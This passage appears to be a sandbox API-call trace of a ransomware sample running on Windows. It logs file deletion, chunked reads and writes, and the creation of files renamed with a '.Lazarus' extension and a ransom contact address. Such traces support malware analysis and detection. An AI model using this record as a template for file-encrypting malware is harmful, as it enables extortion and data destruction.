CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll") returned 92 [0090.634] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 1 [0090.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0090.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0090.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.635] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0090.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.636] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.636] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="APD1B7~1.DLL")) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0090.636] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0090.636] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0090.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0090.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0090.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0090.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.637] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.637] AreFileApisANSI () returned 1 [0090.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 90 [0090.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0090.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.637] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.637] AreFileApisANSI () returned 1 [0090.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0090.637] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0090.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0090.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.638] GetFileType (hFile=0x360) returned 0x1 [0090.638] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.638] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0090.638] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0090.638] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0090.638] CloseHandle (hObject=0x360) returned 1 [0090.638] AreFileApisANSI () returned 1 [0090.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0090.638] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0090.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0090.639] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.639] GetFileType (hFile=0x360) returned 0x1 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.639] CloseHandle (hObject=0x360) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0090.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0090.639] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0090.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0090.640] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0090.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0090.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0090.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0090.756] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0090.756] AreFileApisANSI () returned 1 [0090.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0090.756] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x55f20 [0090.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0090.757] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x60c0)) returned 1 [0090.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.757] AreFileApisANSI () returned 1 [0090.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0090.757] GetLastError () returned 0x0 [0090.757] SetLastError (dwErrCode=0x0) [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e068 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0090.757] GetLastError () returned 0x0 [0090.757] SetLastError (dwErrCode=0x0) [0090.757] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0090.757] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0090.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8af48 [0090.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0090.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0090.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0090.759] AreFileApisANSI () returned 1 [0090.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 152 [0090.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x130) returned 0x4e568 [0090.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=152 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 152 [0090.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.760] GetFileType (hFile=0x360) returned 0x1 [0090.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0090.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0090.761] AreFileApisANSI () returned 1 [0090.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0090.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x4ebc8 [0090.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71c38, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll") returned 90 [0090.761] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.761] GetFileType (hFile=0x33c) returned 0x1 [0090.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0090.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0090.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0090.761] GetLastError () returned 0x0 [0090.761] SetLastError (dwErrCode=0x0) [0090.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0090.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0090.762] GetLastError () returned 0x0 [0090.762] SetLastError (dwErrCode=0x0) [0090.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0090.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.762] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0090.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.770] GetLastError () returned 0x0 [0090.770] SetLastError (dwErrCode=0x0) [0090.770] GetLastError () returned 0x0 [0090.770] SetLastError (dwErrCode=0x0) [0090.770] GetLastError () returned 0x0 [0090.770] SetLastError (dwErrCode=0x0) [0090.770] GetLastError () returned 0x0 [0090.770] SetLastError (dwErrCode=0x0) [0090.770] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.771] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.772] GetLastError () returned 0x0 [0090.772] SetLastError (dwErrCode=0x0) [0090.772] GetLastError () returned 0x0 [0090.772] SetLastError (dwErrCode=0x0) [0090.772] GetLastError () returned 0x0 [0090.772] SetLastError (dwErrCode=0x0) [0090.772] GetLastError () returned 0x0 [0090.772] SetLastError (dwErrCode=0x0) [0090.772] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.773] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, 